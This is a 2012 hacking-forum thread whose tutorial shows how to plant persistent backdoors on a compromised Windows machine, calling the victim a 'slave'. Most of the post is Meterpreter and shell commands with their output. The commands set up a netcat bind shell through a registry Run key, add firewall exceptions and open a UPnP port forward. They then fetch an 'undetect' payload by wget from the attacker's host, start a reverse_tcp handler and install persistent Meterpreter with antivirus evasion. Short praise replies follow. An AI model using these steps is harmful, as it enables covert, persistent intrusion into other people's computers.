Sinisterly
[TuT]How To ♥Fuck Firewall♥ With ♥Metasploit & UPnP♥[TuT] - Printable Version

+- Sinisterly (https://sinister.li)
+-- Forum: Hacking (https://sinister.li/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.li/Forum-Tutorials)
+--- Thread: [TuT]How To ♥Fuck Firewall♥ With ♥Metasploit & UPnP♥[TuT] (/Thread-TuT-How-To-%E2%99%A5Fuck-Firewall%E2%99%A5-With-%E2%99%A5Metasploit-UPnP%E2%99%A5-TuT)



[TuT]How To ♥Fuck Firewall♥ With ♥Metasploit & UPnP♥[TuT] - Pixo - 05-01-2012

[Image: diapositive1hc.png]

Spoiler:
[Image: upnpfucker.png]

[Image: totalhc.png]

YOU CAN DOWNLOAD UPNPC-STATIC ON THIS DIRECT LINK OR ON THIS SITE

Code:
meterpreter>upload /root/binup/nc.exe c:\\windows\\system32 meterpreter>upload /root/binup/upnpc-static.exe c:\\windows\\system32 meterpreter>upload /root/binup/wget.exe c:\\windows\\system32

[Image: total2hc.png]

Spoiler:
Code:
meterpreter>reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe'

THEN TYPE


Code:
meterpreter>shell

CHECK THE OPEN PORT ON WINDOWS FIREWALL

Code:
C:\Windows\system32>netsh firewall show portopening
ADD A RULE THAT CALLED "ServiceFirewall" FOR THE 455 PORT WITH THIS COMMAND

Code:
C:\Windows\system32>netsh firewall add portopening TCP 455 "ServiceFirewall" ENABLE ALL
ADD YOUR STUFF ON FIREWALL EXCEPTION
Code:
C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\exec.exe "exec" ENABLE C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\nc.exe "nc" ENABLE C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\wget.exe "wget" ENABLE C:\Windows\system32>netsh firewall add allowedprogram c:\windows\system32\upnpc-static.exe "upnp" ENABLE
LAUNCH THIS COMMAND FOR ADD A STATIC UPNP RULE

Code:
C:\Windows\system32>upnpc-static -a 172.30.1.10 455 455 TCP 0 upnpc : miniupnpc library test client. (c) 2006-2011 Thomas Bernard Go to http://miniupnp.free.fr/ or http://miniupnp.tuxfamily.org/ for more information. List of UPNP devices found on the network : desc: http://172.30.1.1:2189/rootDesc.xml st: urn:schemas-upnp-org:device:InternetGatewayDevice:1 Found valid IGD : http://172.30.1.1:2189/ctl/IPConn Local LAN ip address : 172.30.1.10 ExternalIPAddress = 192.168.1.14 InternalIP:Port = 172.30.1.10:455 external 192.168.1.14:455 TCP is redirected to internal 172.30.1.10:455 (duration=0)
NOW YOU HAVE CORRECTLY SETUP YOUR FIRST BACKDOOR, LET'S GO TO THE SECOND

[Image: diapositive10hc.png]
Spoiler:

NOW YOU HAVE A SILENT ACCESS TO YOUR SLAVE YOU CAN SETUP YOUR 2ND BACKDOOR.
HOST A PAYLOAD ON A LOCAL OR A REMOTE SITE.
I CHOOSE THE LOCAL.
TYPE IN CONSOLE:

Code:
root@bt~:# nc 192.168.1.14 455 pfSense.lan [192.168.1.14] 455 (?) open Microsoft Windows [version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. Tous droits r�serv�s. C:\Windows\system32>
CREATE A PAYLOAD UNDETECT AND PAST IT IN /var/www AND TYPE :
Code:
C:\Windows\system32>wget http://192.168.1.97/Msf.exe --19:25:27-- http://192.168.1.97/Msf.exe => `Msf.exe' Connecting to 192.168.1.97:80... connected. HTTP request sent, awaiting response... 200 OK Length: 73,802 [application/x-msdos-program] 0K .......... .......... .......... .......... .......... 69% 48.83 MB/s 50K .......... .......... .. 100% 21.55 MB/s 19:25:27 (70.38 MB/s) - `Msf.exe' saved [73802/73802]

OPEN A SECOND CONSOLE AND LAUNCH A LISTENER WITH :
Code:
root@bt~:#msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E
AND HIT A METERPRETER
Code:
C:\Windows\system32>Msf.exe
NOW YOU HAVE FULL CONTROL OF THE SLAVE YOU CAN INSTALL A PERSISTENT METERPRETER
WE USE A TEMPLATE FOR AVOID ANTIVIRUS WITH THE -T OPTION

Code:
meterpreter>run persistence -S -T /var/www/exec.exe -U -X -i 5 -p 4444(FORWARDED PORT) -r WAN ADDRESS OF YOUR INTERNET PROVIDER
NOW EACH TIME A USER LOGS THIS WILL OPEN A METERPRETER

Conclusion

UPnP is very dangerous
Even today, the UPnP IGD is enabled by default on many router.
I have read other articles dealing with the flaws in UPnP integrate flash or flaws XSS.
The best way to guard against this kind of attack is simply to disable it.



RE: [TuT]How To ♥fudge Firewall♥ With ♥Metasploit & UPnP♥[TuT] - HrDe - 05-01-2012

again a HQ post , want in Thread Market.....


RE: [TuT]How To ♥fudge Firewall♥ With ♥Metasploit & UPnP♥[TuT] - Shining White - 05-01-2012

(05-01-2012, 08:39 PM)HrDe Wrote: again a HQ post , want in Thread Market.....

fuck i was in love with HrDe because of his HQ ,

never mind i can love you too Biggrin

Good Thread No :
Awesome threads ,


RE: [TuT]How To ♥fudge Firewall♥ With ♥Metasploit & UPnP♥[TuT] - FunKx - 05-01-2012

Too bad my metasploit doesn't work Biggrin


RE: [TuT]How To ♥fudge Firewall♥ With ♥Metasploit & UPnP♥[TuT] - editify - 05-02-2012

Amazing tutorial bro.
Thanks a lot